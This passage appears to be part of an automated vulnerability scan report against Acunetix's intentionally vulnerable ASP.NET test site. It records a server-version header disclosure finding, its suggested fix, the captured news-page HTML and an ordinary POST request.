WZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        28. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B